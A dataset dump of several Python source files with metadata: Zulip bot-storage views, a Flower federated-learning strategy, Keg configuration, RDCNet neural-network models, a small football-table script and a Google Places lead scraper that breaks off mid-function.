        set_bot_storage(user_profile, list(storage.items()))
    except StateError as e:  # nocoverage
        raise JsonableError(str(e))
    return json_success(request)
@has_request_variables
def get_storage(
    request: HttpRequest,
    user_profile: UserProfile,
    keys: Optional[List[str]] = REQ(json_validator=check_list(check_string), default=None),
) -> HttpResponse:
    """Fetch the requested keys (all keys by default) from bot storage.

    Returns a JSON success response with a "storage" mapping of
    key -> stored value; unknown keys surface as JsonableError.
    """
    if keys is None:
        # No explicit key list: return the bot's entire storage.
        keys = get_keys_in_bot_storage(user_profile)
    try:
        storage = {key: get_bot_storage(user_profile, key) for key in keys}
    except StateError as e:
        raise JsonableError(str(e))
    return json_success(request, data={"storage": storage})
@has_request_variables
def remove_storage(
    request: HttpRequest,
    user_profile: UserProfile,
    keys: Optional[List[str]] = REQ(json_validator=check_list(check_string), default=None),
) -> HttpResponse:
    """Delete the requested keys (all keys by default) from bot storage.

    Storage-layer failures (StateError, e.g. for missing keys) are
    reported to the client as JsonableError.
    """
    if keys is None:
        # No explicit key list: clear the bot's entire storage.
        keys = get_keys_in_bot_storage(user_profile)
    try:
        remove_bot_storage(user_profile, keys)
    except StateError as e:
        raise JsonableError(str(e))
    return json_success(request)
| 1,190 | 0 | 66 |
bcaa254a65f77dc17282d3b1ab843091945002a6 | 3,147 | py | Python | src/flower/strategy/default.py | sishtiaq/flower | e8d57941863dcd193d2c0f4989f3ece5136ce027 | [
"Apache-2.0"
] | null | null | null | src/flower/strategy/default.py | sishtiaq/flower | e8d57941863dcd193d2c0f4989f3ece5136ce027 | [
"Apache-2.0"
] | null | null | null | src/flower/strategy/default.py | sishtiaq/flower | e8d57941863dcd193d2c0f4989f3ece5136ce027 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configurable strategy implementation."""
from typing import Callable, List, Optional, Tuple
from flower.typing import Weights
from .aggregate import aggregate, weighted_loss_avg
from .strategy import Strategy
class DefaultStrategy(Strategy):
"""Configurable default strategy."""
# pylint: disable-msg=too-many-arguments
def __init__(
self,
fraction_fit: float = 0.1,
fraction_eval: float = 0.1,
min_fit_clients: int = 1,
min_eval_clients: int = 1,
min_available_clients: int = 1,
eval_fn: Optional[Callable[[Weights], Optional[Tuple[float, float]]]] = None,
) -> None:
"""Constructor."""
super().__init__()
self.min_fit_clients = min_fit_clients
self.min_eval_clients = min_eval_clients
self.fraction_fit = fraction_fit
self.fraction_eval = fraction_eval
self.min_available_clients = min_available_clients
self.eval_fn = eval_fn
def should_evaluate(self) -> bool:
"""Evaluate every round."""
return self.eval_fn is None
def num_fit_clients(self, num_available_clients: int) -> Tuple[int, int]:
"""Use a fraction of available clients for training."""
num_clients = int(num_available_clients * self.fraction_fit)
return max(num_clients, self.min_fit_clients), self.min_available_clients
def num_evaluation_clients(self, num_available_clients: int) -> Tuple[int, int]:
"""Use a fraction of available clients for evaluation."""
num_clients = int(num_available_clients * self.fraction_eval)
return max(num_clients, self.min_eval_clients), self.min_available_clients
def evaluate(self, weights: Weights) -> Optional[Tuple[float, float]]:
"""Evaluate model weights using an evaluation function (if provided)."""
if self.eval_fn is None:
# No evaluation function provided
return None
return self.eval_fn(weights)
def on_aggregate_fit(
self, results: List[Tuple[Weights, int]], failures: List[BaseException]
) -> Optional[Weights]:
"""Aggregate fit results using weighted average (as in FedAvg)."""
return aggregate(results)
def on_aggregate_evaluate(
self, results: List[Tuple[int, float]], failures: List[BaseException]
) -> Optional[float]:
"""Aggregate evaluation losses using weighted average."""
return weighted_loss_avg(results)
| 39.3375 | 85 | 0.6762 | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configurable strategy implementation."""
from typing import Callable, List, Optional, Tuple
from flower.typing import Weights
from .aggregate import aggregate, weighted_loss_avg
from .strategy import Strategy
class DefaultStrategy(Strategy):
    """Configurable default strategy (FedAvg-style aggregation)."""
    # pylint: disable-msg=too-many-arguments
    def __init__(
        self,
        fraction_fit: float = 0.1,
        fraction_eval: float = 0.1,
        min_fit_clients: int = 1,
        min_eval_clients: int = 1,
        min_available_clients: int = 1,
        eval_fn: Optional[Callable[[Weights], Optional[Tuple[float, float]]]] = None,
    ) -> None:
        """Constructor.

        Args:
            fraction_fit: Fraction of available clients sampled for training.
            fraction_eval: Fraction of available clients sampled for
                evaluation.
            min_fit_clients: Lower bound on the number of training clients.
            min_eval_clients: Lower bound on the number of evaluation clients.
            min_available_clients: Minimum number of connected clients
                required.
            eval_fn: Optional centralized evaluation function; when set,
                ``should_evaluate`` returns False and ``evaluate`` uses it.
        """
        super().__init__()
        self.min_fit_clients = min_fit_clients
        self.min_eval_clients = min_eval_clients
        self.fraction_fit = fraction_fit
        self.fraction_eval = fraction_eval
        self.min_available_clients = min_available_clients
        self.eval_fn = eval_fn
    def should_evaluate(self) -> bool:
        """Evaluate every round, but only when no centralized eval_fn is set."""
        return self.eval_fn is None
    def num_fit_clients(self, num_available_clients: int) -> Tuple[int, int]:
        """Use a fraction of available clients for training.

        Returns a (sample size, minimum available clients) tuple; the
        sample size never drops below ``min_fit_clients``.
        """
        num_clients = int(num_available_clients * self.fraction_fit)
        return max(num_clients, self.min_fit_clients), self.min_available_clients
    def num_evaluation_clients(self, num_available_clients: int) -> Tuple[int, int]:
        """Use a fraction of available clients for evaluation.

        Returns a (sample size, minimum available clients) tuple; the
        sample size never drops below ``min_eval_clients``.
        """
        num_clients = int(num_available_clients * self.fraction_eval)
        return max(num_clients, self.min_eval_clients), self.min_available_clients
    def evaluate(self, weights: Weights) -> Optional[Tuple[float, float]]:
        """Evaluate model weights using an evaluation function (if provided)."""
        if self.eval_fn is None:
            # No evaluation function provided
            return None
        return self.eval_fn(weights)
    def on_aggregate_fit(
        self, results: List[Tuple[Weights, int]], failures: List[BaseException]
    ) -> Optional[Weights]:
        """Aggregate fit results using weighted average (as in FedAvg)."""
        return aggregate(results)
    def on_aggregate_evaluate(
        self, results: List[Tuple[int, float]], failures: List[BaseException]
    ) -> Optional[float]:
        """Aggregate evaluation losses using weighted average."""
        return weighted_loss_avg(results)
| 0 | 0 | 0 |
56c5e848525e61dd3c7e758898d25b65e43c59ba | 603 | py | Python | ex066.py | EduotavioFonseca/ProgramasPython | 8e0ef5f6f4239d1fe52321f8795b6573f6ff5130 | [
"MIT"
] | null | null | null | ex066.py | EduotavioFonseca/ProgramasPython | 8e0ef5f6f4239d1fe52321f8795b6573f6ff5130 | [
"MIT"
] | null | null | null | ex066.py | EduotavioFonseca/ProgramasPython | 8e0ef5f6f4239d1fe52321f8795b6573f6ff5130 | [
"MIT"
] | null | null | null | # Tabela do Brasileirão
# Tuple of the 20 Série A clubs; index order is the league table
# (index 0 = leader, index 19 = last place).
times = ('Internacional', 'São Paulo', 'Flamengo', 'Atlético-MG', 'Palmeiras', 'Grêmio', 'Fluminense', 'Ceará',
         'Santos', 'Corinthians', 'Bragantino', 'Athletico', 'Atlético-GO', 'Sport', 'Vasco', 'Fortaleza', 'Bahia',
         'Goiás', 'Coritiba', 'Botafogo')
# The original `while True: ... break` body always reached `break`, so the
# loop ran exactly once; it was removed — the printed output is unchanged.
print()
print(f'Os 5 primeiros colocados são: {times[0:5]}')
print()
print(f'Os 4 últimos colocados são: {times[16:]}')
print()
print(f'Times: {sorted(times)}')
print()
print(f'O Bragantino está na posição: {times.index("Bragantino")+1}')
| 37.6875 | 116 | 0.60199 | # Tabela do Brasileirão
# Duplicate copy of the standings script (this dataset dump stores each file twice).
# Tuple of the 20 clubs; index order is the league table (0 = leader).
times = ('Internacional', 'São Paulo', 'Flamengo', 'Atlético-MG', 'Palmeiras', 'Grêmio', 'Fluminense', 'Ceará',
         'Santos', 'Corinthians', 'Bragantino', 'Athletico', 'Atlético-GO', 'Sport', 'Vasco', 'Fortaleza', 'Bahia',
         'Goiás', 'Coritiba', 'Botafogo')
# NOTE(review): this `while True` body always reaches `break`, so it runs
# exactly once — the loop construct adds nothing.
while True:
    print()
    print(f'Os 5 primeiros colocados são: {times[0:5]}')
    print()
    print(f'Os 4 últimos colocados são: {times[16:]}')
    print()
    print(f'Times: {sorted(times)}')
    print()
    print(f'O Bragantino está na posição: {times.index("Bragantino")+1}')
    break
| 0 | 0 | 0 |
aea92b50d275d2897a488416691716c9140ee10a | 6,979 | py | Python | keg/config.py | level12/keg | 6f148a9bd0b8e167007ed5c2a0000daf7de3aee2 | [
"BSD-3-Clause"
] | 15 | 2015-06-26T09:01:53.000Z | 2020-08-28T16:29:14.000Z | keg/config.py | level12/keg | 6f148a9bd0b8e167007ed5c2a0000daf7de3aee2 | [
"BSD-3-Clause"
] | 165 | 2015-03-27T06:49:38.000Z | 2022-03-11T21:39:52.000Z | keg/config.py | level12/keg | 6f148a9bd0b8e167007ed5c2a0000daf7de3aee2 | [
"BSD-3-Clause"
] | 9 | 2015-04-22T17:03:32.000Z | 2018-06-25T17:48:15.000Z | from __future__ import absolute_import
import os.path as osp
import appdirs
from blazeutils.helpers import tolist
import flask
from pathlib import PurePath
import six
from werkzeug.utils import (
import_string,
ImportStringError
)
from keg.utils import app_environ_get, pymodule_fpaths_to_objects
substitute = SubstituteValue
# The following three classes are default configuration profiles
| 34.549505 | 100 | 0.648947 | from __future__ import absolute_import
import os.path as osp
import appdirs
from blazeutils.helpers import tolist
import flask
from pathlib import PurePath
import six
from werkzeug.utils import (
import_string,
ImportStringError
)
from keg.utils import app_environ_get, pymodule_fpaths_to_objects
class ConfigurationError(Exception):
    """Error type for app-configuration problems (defined for callers;
    not raised anywhere in this module)."""
    pass
class SubstituteValue(object):
    """Wrapper marking a config value for deferred string substitution.

    Config.substitution_apply() replaces each SubstituteValue entry with
    ``value.format(**Config.substitution_values())``.
    """
    def __init__(self, value):
        # value: a format string, e.g. '{user_log_dir}/app.log'
        self.value = value
# Short lowercase alias, e.g. for use inside app config files.
substitute = SubstituteValue
class Config(flask.Config):
    """flask.Config subclass that layers Keg defaults, app defaults, the
    selected profile classes, and on-disk ``<app_import_name>-config.py``
    files, then applies deferred string substitution (see SubstituteValue)."""
    # Dotted-path templates tried lowest priority first; ``{profile}`` entries
    # are skipped when no profile is selected (see default_config_locations_parsed).
    default_config_locations = [
        # Keg's defaults
        'keg.config.DefaultProfile',
        # Keg's defaults for the selected profile
        'keg.config.{profile}',
        # App defaults for all profiles
        '{app_import_name}.config.DefaultProfile',
        # apply the profile specific defaults that are in the app's config file
        '{app_import_name}.config.{profile}',
    ]
    def from_obj_if_exists(self, obj_location):
        """Load settings from ``obj_location`` if it is importable; a missing
        object is ignored, any unrelated import error is re-raised."""
        try:
            self.from_object(obj_location)
            self.configs_found.append(obj_location)
        except ImportStringError as e:
            # Only swallow the error when it refers to obj_location itself;
            # a failure deeper inside the imported module must propagate.
            if obj_location not in str(e):
                raise
    def default_config_locations_parsed(self):
        """Return default_config_locations with app name and profile filled
        in, dropping profile-specific entries when no profile is set."""
        retval = []
        for location in self.default_config_locations:
            # if no profile is given, the location want's one, that location isn't valid
            if '{profile}' in location and self.profile is None:
                continue
            retval.append(location.format(app_import_name=self.app_import_name,
                                          profile=self.profile))
        return retval
    def init_app(self, app_config_profile, app_import_name, app_root_path, use_test_profile,
                 config_file_objs=None):
        """Resolve the active profile and load configuration in priority
        order: default locations first, then the app's config files, finally
        SubstituteValue substitution.

        config_file_objs may be injected (bypassing disk); otherwise the
        candidate files from config_file_paths() are read.
        """
        self.use_test_profile = use_test_profile
        self.profile = app_config_profile
        self.dirs = appdirs.AppDirs(app_import_name, appauthor=False, multipath=True)
        self.app_import_name = app_import_name
        self.app_root_path = app_root_path
        # (fpath, exception) pairs for config files that could not be read.
        self.config_paths_unreadable = []
        if config_file_objs:
            self.config_file_objs = config_file_objs
        else:
            self.config_file_objs = []
            possible_config_fpaths = self.config_file_paths()
            fpaths_to_objects = pymodule_fpaths_to_objects(possible_config_fpaths)
            for fpath, objects, exc in fpaths_to_objects:
                if objects is None:
                    self.config_paths_unreadable.append((fpath, exc))
                else:
                    self.config_file_objs.append((fpath, objects))
        if self.profile is None:
            self.profile = self.determine_selected_profile()
        self.configs_found = []
        for dotted_location in self.default_config_locations_parsed():
            dotted_location = dotted_location.format(app_import_name=app_import_name,
                                                     profile=self.profile)
            self.from_obj_if_exists(dotted_location)
        # apply settings from any of this app's configuration files
        for fpath, objects in self.config_file_objs:
            if self.profile in objects:
                self.from_object(objects[self.profile])
                self.configs_found.append('{}:{}'.format(fpath, self.profile))
        sub_values = self.substitution_values()
        self.substitution_apply(sub_values)
    def config_file_paths(self):
        """Candidate ``<app_import_name>-config.py`` paths: site config dirs,
        /etc-style locations (platform dependent), the user config dir, and
        the directory above the app root — in that order."""
        dirs = self.dirs
        config_fname = '{}-config.py'.format(self.app_import_name)
        dpaths = []
        if appdirs.system != 'win32':
            dpaths.extend(dirs.site_config_dir.split(':'))
            dpaths.append('/etc/{}'.format(self.app_import_name))
            dpaths.append('/etc')
        else:
            # On Windows, build an /etc-style location on the system drive.
            system_drive = PurePath(dirs.site_config_dir).drive
            system_etc_dir = PurePath(system_drive, '/', 'etc')
            dpaths.extend((
                dirs.site_config_dir,
                system_etc_dir.joinpath(self.app_import_name).__str__(),
                system_etc_dir.__str__()
            ))
        dpaths.append(dirs.user_config_dir)
        dpaths.append(osp.dirname(self.app_root_path))
        fpaths = [osp.join(dpath, config_fname) for dpath in dpaths]
        return fpaths
    def email_error_to(self):
        """Error-mail recipients as a list; KEG_EMAIL_OVERRIDE_TO, when set,
        takes precedence over KEG_EMAIL_ERROR_TO."""
        error_to = self.get('KEG_EMAIL_ERROR_TO')
        override_to = self.get('KEG_EMAIL_OVERRIDE_TO')
        if override_to:
            return tolist(override_to)
        return tolist(error_to)
    def determine_selected_profile(self):
        """Pick the config profile: environment variable first, then the
        test-profile flags, then DEFAULT_PROFILE from the app's config module
        and from each config file (later files win)."""
        # if we find the value in the environment, use it
        profile = app_environ_get(self.app_import_name, 'CONFIG_PROFILE')
        if profile is not None:
            return profile
        use_test_profile = app_environ_get(self.app_import_name, 'USE_TEST_PROFILE', '')
        if use_test_profile.strip() or self.use_test_profile:
            return 'TestProfile'
        # look for it in the app's main config file (e.g. myapp.config)
        app_config = import_string('{}.config'.format(self.app_import_name), silent=True)
        if app_config and hasattr(app_config, 'DEFAULT_PROFILE'):
            profile = app_config.DEFAULT_PROFILE
        # Look for it in all the config files found. This loops from lowest-priority config file
        # to highest priority, so the last file found with a value is kept. Accordingly, any app
        # specific file has priority over the app's main config file, which could be set just above.
        for fpath, objects in self.config_file_objs:
            if 'DEFAULT_PROFILE' in objects:
                profile = objects['DEFAULT_PROFILE']
        return profile
    def substitution_values(self):
        """Mapping of placeholder names available to SubstituteValue configs."""
        return dict(
            user_log_dir=self.dirs.user_log_dir,
            app_import_name=self.app_import_name,
        )
    def substitution_apply(self, sub_values):
        """Replace every SubstituteValue entry with its formatted string."""
        for config_key, config_value in self.items():
            if not isinstance(config_value, SubstituteValue):
                continue
            new_value = config_value.value.format(**sub_values)
            self[config_key] = new_value
# The following three classes are default configuration profiles
class DefaultProfile(object):
    """Keg defaults applied to every app and profile."""
    # Permission bits — presumably used when Keg creates its directories;
    # confirm against keg's filesystem helpers.
    KEG_DIR_MODE = 0o777
    # Endpoint names used for home/login/logout redirects.
    KEG_ENDPOINTS = dict(
        home='public.home',
        login='public.home',
        after_login='public.home',
        after_logout='public.home',
    )
    KEG_DB_DIALECT_OPTIONS = {}
class DevProfile(object):
    """Profile intended for local development (debug enabled)."""
    DEBUG = True
class TestProfile(object):
    """Profile selected for test runs (see Config.determine_selected_profile)."""
    DEBUG = True
    TESTING = True
    KEG_LOG_SYSLOG_ENABLED = False
    # set this to allow generation of URLs without a request context
    SERVER_NAME = 'keg.example.com' if six.PY3 else b'keg.example.com'
    # simple value for testing is fine
    SECRET_KEY = '12345'
    # Sane default values for testing to get rid of warnings.
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:'
| 5,064 | 1,341 | 163 |
91b8f58f0aef4a4e4c306770d42549a707d7b742 | 5,038 | py | Python | rdcnet/models/rdcnet.py | fmi-basel/RDCNet | f1ebcab7b7325b08506b8da291a63c7c0470fe5f | [
"MIT"
] | 5 | 2020-10-07T03:48:56.000Z | 2021-05-27T06:28:41.000Z | rdcnet/models/rdcnet.py | fmi-basel/RDCNet | f1ebcab7b7325b08506b8da291a63c7c0470fe5f | [
"MIT"
] | null | null | null | rdcnet/models/rdcnet.py | fmi-basel/RDCNet | f1ebcab7b7325b08506b8da291a63c7c0470fe5f | [
"MIT"
] | 1 | 2021-06-25T10:32:02.000Z | 2021-06-25T10:32:02.000Z | import tensorflow as tf
import numpy as np
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, LeakyReLU
from rdcnet.layers.nd_layers import get_nd_conv, get_nd_spatial_dropout, get_nd_conv_transposed
from rdcnet.layers.padding import DynamicPaddingLayer, DynamicTrimmingLayer
from rdcnet.layers.stacked_dilated_conv import StackedDilatedConv
def delta_loop(output_channels, recurrent_block, n_steps=3):
    '''Recursively applies a given block to refine its output.
    Args:
        output_channels: number of output channels.
        recurrent_block: a network taking (input_channels + output_channels) as
            input and outputting output_channels
        n_steps: number of times the block is applied
    '''
    # NOTE(review): `block` is undefined in this copy — the inner function
    # appears to have been stripped by the dataset's filtering; see the
    # complete delta_loop definition later in this file.
    return block
def rdc_block(n_groups=16,
              dilation_rates=(1, 2, 4, 8, 16),
              channels_per_group=32,
              k_size=3,
              spatial_dims=2,
              dropout=0.1):
    '''Grouped conv with stacked dilated conv in each group and pointwise convolution for mixing
    Notes
    -----
    pre-activation to keep the residual path clear as described in:
    HE, Kaiming, et al. Identity mappings in deep residual networks.
    In: European conference on computer vision. Springer, Cham, 2016.
    S. 630-645.
    '''
    Conv = get_nd_conv(spatial_dims)
    channels = channels_per_group * n_groups
    sd_conv = StackedDilatedConv(rank=spatial_dims,
                                 filters=channels,
                                 kernel_size=k_size,
                                 dilation_rates=dilation_rates,
                                 groups=n_groups,
                                 activation=LeakyReLU())
    # mixes ch/reduce from input_ch + channels_per_group*n_groups
    reduce_ch_conv = Conv(channels, 1)
    spatial_dropout = get_nd_spatial_dropout(spatial_dims)(dropout)
    # NOTE(review): `_call` is undefined in this copy — the inner function
    # (dropout -> activation -> 1x1 conv -> activation -> dilated conv in the
    # complete rdc_block later in this file) was stripped by the dataset filter.
    return _call
def GenericRDCnetBase(input_shape,
                      downsampling_factor,
                      n_downsampling_channels,
                      n_output_channels,
                      n_groups=16,
                      dilation_rates=(1, 2, 4, 8, 16),
                      channels_per_group=32,
                      n_steps=5,
                      dropout=0.1):
    '''delta loop with input/output rescaling and atrous grouped conv recurrent block'''
    # NOTE(review): this is the first of two identical copies of this function
    # in the dump; the second copy later in the file carries fuller comments.
    spatial_dims = len(input_shape) - 1
    downsampling_factor = tuple(
        np.broadcast_to(np.array(downsampling_factor), spatial_dims).tolist())
    recurrent_block = rdc_block(n_groups,
                                dilation_rates,
                                channels_per_group,
                                spatial_dims=spatial_dims,
                                dropout=dropout)
    n_features = channels_per_group * n_groups
    loop = delta_loop(n_features, recurrent_block, n_steps)
    in_kernel_size = tuple(max(3, f) for f in downsampling_factor)
    out_kernel_size = tuple(max(3, 2 * f) for f in downsampling_factor)
    Conv = get_nd_conv(spatial_dims)
    conv_in = Conv(n_downsampling_channels,
                   kernel_size=in_kernel_size,
                   strides=downsampling_factor,
                   padding='same')
    ConvTranspose = get_nd_conv_transposed(spatial_dims)
    conv_out = ConvTranspose(n_output_channels,
                             kernel_size=out_kernel_size,
                             strides=downsampling_factor,
                             padding='same')
    input_padding = DynamicPaddingLayer(downsampling_factor,
                                        ndim=spatial_dims + 2)
    output_trimming = DynamicTrimmingLayer(ndim=spatial_dims + 2)
    inputs = Input(shape=input_shape)
    x = input_padding(inputs)
    x = conv_in(x)
    x = loop(x)
    x = LeakyReLU()(x)
    x = conv_out(x)
    x = output_trimming([inputs, x])
    name = 'RDCNet-F{}-DC{}-OC{}-G{}-DR{}-GC{}-S{}-D{}'.format(
        _format_tuple(downsampling_factor),
        n_downsampling_channels, n_output_channels, n_groups,
        _format_tuple(dilation_rates), channels_per_group, n_steps, dropout)
    return Model(inputs=inputs, outputs=[x], name=name)
| 34.040541 | 96 | 0.601826 | import tensorflow as tf
import numpy as np
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, LeakyReLU
from rdcnet.layers.nd_layers import get_nd_conv, get_nd_spatial_dropout, get_nd_conv_transposed
from rdcnet.layers.padding import DynamicPaddingLayer, DynamicTrimmingLayer
from rdcnet.layers.stacked_dilated_conv import StackedDilatedConv
def delta_loop(output_channels, recurrent_block, n_steps=3):
    '''Iteratively refine a state tensor by adding the block's output.

    Args:
        output_channels: channel count of the recurrent state.
        recurrent_block: a network taking (input_channels + output_channels)
            channels as input and producing output_channels channels.
        n_steps: how many refinement iterations to unroll.

    Returns:
        A callable ``(x, state=None) -> state``; when no state is supplied it
        starts from zeros shaped like x's leading dims plus output_channels.
    '''
    def run(x, state=None):
        if state is None:
            # Zero-initialise: x's shape minus its channel dim, with
            # output_channels appended as the new last dimension.
            state_shape = tf.concat(
                [tf.shape(x)[:-1], tf.constant([output_channels])], axis=0)
            state = tf.zeros(state_shape, x.dtype)
        for _ in range(n_steps):  # statically unrolled loop
            state = state + recurrent_block(tf.concat([x, state], axis=-1))
        return state
    return run
def rdc_block(n_groups=16,
              dilation_rates=(1, 2, 4, 8, 16),
              channels_per_group=32,
              k_size=3,
              spatial_dims=2,
              dropout=0.1):
    '''Build the recurrent RDC block: spatial dropout, a pre-activated 1x1
    mixing convolution, then a grouped stacked-dilated convolution.

    Pre-activation keeps the residual path clear, as described in:
    He, Kaiming, et al. "Identity mappings in deep residual networks."
    European conference on computer vision, Springer, Cham, 2016, pp. 630-645.
    '''
    total_channels = channels_per_group * n_groups
    dilated_conv = StackedDilatedConv(rank=spatial_dims,
                                      filters=total_channels,
                                      kernel_size=k_size,
                                      dilation_rates=dilation_rates,
                                      groups=n_groups,
                                      activation=LeakyReLU())
    # 1x1 conv mixing/reducing the concatenated input + state channels.
    mixing_conv = get_nd_conv(spatial_dims)(total_channels, 1)
    dropout_layer = get_nd_spatial_dropout(spatial_dims)(dropout)
    def apply_block(features):
        features = dropout_layer(features)
        features = LeakyReLU()(features)
        features = mixing_conv(features)
        features = LeakyReLU()(features)
        return dilated_conv(features)
    return apply_block
def _format_tuple(val):
unique_val = tuple(set(val))
if len(unique_val) == 1:
return str(unique_val[0])
else:
return str(val).replace(', ', '-').replace('(', '').replace(')', '')
def GenericRDCnetBase(input_shape,
                      downsampling_factor,
                      n_downsampling_channels,
                      n_output_channels,
                      n_groups=16,
                      dilation_rates=(1, 2, 4, 8, 16),
                      channels_per_group=32,
                      n_steps=5,
                      dropout=0.1):
    '''delta loop with input/output rescaling and atrous grouped conv recurrent block

    Builds a Keras Model: strided conv downsampling, a statically unrolled
    delta loop over rdc_block, then transposed-conv upsampling back to the
    input resolution, with dynamic padding/trimming around the whole pipeline.
    '''
    spatial_dims = len(input_shape) - 1
    # Broadcast a scalar factor to one entry per spatial dimension.
    downsampling_factor = tuple(
        np.broadcast_to(np.array(downsampling_factor), spatial_dims).tolist())
    recurrent_block = rdc_block(n_groups,
                                dilation_rates,
                                channels_per_group,
                                spatial_dims=spatial_dims,
                                dropout=dropout)
    n_features = channels_per_group * n_groups
    loop = delta_loop(n_features, recurrent_block, n_steps)
    # Kernel sizes are at least 3 and scale with the downsampling factor.
    in_kernel_size = tuple(max(3, f) for f in downsampling_factor)
    out_kernel_size = tuple(max(3, 2 * f) for f in downsampling_factor)
    Conv = get_nd_conv(spatial_dims)
    conv_in = Conv(n_downsampling_channels,
                   kernel_size=in_kernel_size,
                   strides=downsampling_factor,
                   padding='same')
    ConvTranspose = get_nd_conv_transposed(spatial_dims)
    conv_out = ConvTranspose(n_output_channels,
                             kernel_size=out_kernel_size,
                             strides=downsampling_factor,
                             padding='same')
    # Pad inputs to a multiple of the factor; trim outputs back afterwards.
    input_padding = DynamicPaddingLayer(downsampling_factor,
                                        ndim=spatial_dims + 2)
    output_trimming = DynamicTrimmingLayer(ndim=spatial_dims + 2)
    inputs = Input(shape=input_shape)
    x = input_padding(inputs)
    x = conv_in(x)
    x = loop(x)
    x = LeakyReLU()(x)
    x = conv_out(x)
    x = output_trimming([inputs, x])
    # Encode the hyperparameters into the model name.
    name = 'RDCNet-F{}-DC{}-OC{}-G{}-DR{}-GC{}-S{}-D{}'.format(
        _format_tuple(downsampling_factor),
        n_downsampling_channels, n_output_channels, n_groups,
        _format_tuple(dilation_rates), channels_per_group, n_steps, dropout)
    return Model(inputs=inputs, outputs=[x], name=name)
| 763 | 0 | 76 |
f4dfc6814251debd6daa61577a5da72dc7586bee | 5,854 | py | Python | scrape.py | TienDang2802/evs-scraper | 6538683e0e9db11a559022c8a9aafe67ed5024f6 | [
"MIT"
] | null | null | null | scrape.py | TienDang2802/evs-scraper | 6538683e0e9db11a559022c8a9aafe67ed5024f6 | [
"MIT"
] | null | null | null | scrape.py | TienDang2802/evs-scraper | 6538683e0e9db11a559022c8a9aafe67ed5024f6 | [
"MIT"
] | null | null | null | from googleplaces import GooglePlaces, types, lang
import googlemaps
import csv
from time import sleep
import requests
import sys
import re
from send_mail import *
if __name__ == '__main__':
    # NOTE(review): `scrape` is not defined in this stripped copy and, in the
    # full copy later in this file, requires six arguments — running this
    # guard directly would fail. Confirm the intended entry point.
    scrape()
| 36.5875 | 116 | 0.569354 | from googleplaces import GooglePlaces, types, lang
import googlemaps
import csv
from time import sleep
import requests
import sys
import re
from send_mail import *
def scrape(query, city, filters_exclude, filters_include, user, uid):
    """Run process_filter() and write the rows to '<user><uid>_leads.csv'.

    The first row is the fixed CSV header; any rows returned by
    process_filter() are appended below it. Note that uid only affects the
    output file name — it is not passed on to process_filter().
    """
    results = [['Name', 'Company Domain', 'Phone Number', 'Company owner', 'Lifecycle stage', 'Country', 'City']]
    results_process = process_filter(query, city, filters_exclude, filters_include, user)
    if results_process:
        results += results_process
    # create file that will be send to user and admin (in BCC)
    with open(str(user) + str(uid) + '_leads.csv', 'w', newline='') as f:
        writer = csv.writer(f)
        for result in results:
            writer.writerow(result)
def process_filter(query, city, filters_exclude, filters_include, user, is_web=False):
    """Search Google Places for every (city, query) pair and return result rows.

    query, city, filters_exclude and filters_include are comma-separated
    strings. Exclude words are matched against the place name and the page
    source; include words must appear in the page source. When is_web is
    True only the first page of each search is processed and rows use the
    web layout (see render_result).
    """
    results = []
    query_list = query.split(',')
    city_list = city.split(',')
    filters_exclude_list = []
    if filters_exclude != '':
        filters_exclude_list = filters_exclude.split(',')
        filters_exclude_list = [x.strip() for x in filters_exclude_list]
    filters_include_list = []
    if filters_include != '':
        filters_include_list = filters_include.split(',')
        filters_include_list = [x.strip() for x in filters_include_list]
    total_city = len(city_list)
    print('Total cities: {}'.format(total_city))
    # Search radius (metres per the GooglePlaces API) from the environment.
    radius = int(os.environ.get('SEARCH_RADIUS'))
    google_places_api = GooglePlaces(os.environ['GP_API_KEY1'])
    gmaps = googlemaps.Client(key=os.environ['GP_API_KEY1'])
    query_result = {}
    for city in city_list:
        print('Processing city: {}'.format(city))
        for query in query_list:
            print('Processing query string {} of city {} with radius={}'.format(query, city, radius))
            # Geocode the city so the nearby search can be centred on it.
            geocode_result = gmaps.geocode(city)
            latlng = '{}, {}'.format(geocode_result[0]['geometry']['location']['lat'],
                                     geocode_result[0]['geometry']['location']['lng'])
            try:
                query_result = google_places_api.nearby_search(keyword=query, radius=radius, location=latlng)
            except:
                # First key failed: wait, retry with the secondary API key,
                # and alert the admin if the retry fails as well.
                sleep(30)
                try:
                    google_places_api2 = GooglePlaces(os.environ['GP_API_KEY2'])
                    query_result = google_places_api2.nearby_search(keyword=query, radius=radius, location=latlng)
                except:
                    send_error(user)
            # Page through the search results until no next-page token remains.
            while True:
                if query_result:
                    for place in query_result.places:
                        place.get_details()
                        if place.website:
                            if filters_exclude_list:
                                # Drop places whose *name* contains an excluded word.
                                if any(word.strip().lower() in place.name.lower() for word in filters_exclude_list):
                                    print('exclude full continue')
                                    continue
                        # No website, or an https site: keep it without fetching the page.
                        if not place.website or 'https' in place.website:
                            results.append(render_result(place, is_web))
                            continue
                        # filter
                        page_content_text = ''
                        try:
                            page_content = requests.get(place.website)
                            page_content_text = page_content.text
                        except Exception as e:
                            # Fetch failed: keep the place anyway.
                            # NOTE(review): on this path the place is appended
                            # here AND again below (page_content_text stays
                            # empty so no filter `continue` fires) — likely
                            # duplicate rows.
                            print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)
                            results.append(render_result(place, is_web))
                        if page_content_text and filters_exclude_list:
                            filter_exclude = is_filters_exclude(page_content_text, filters_exclude_list)
                            if filter_exclude:
                                print('Filter exclude')
                                continue
                        if page_content_text and filters_include_list:
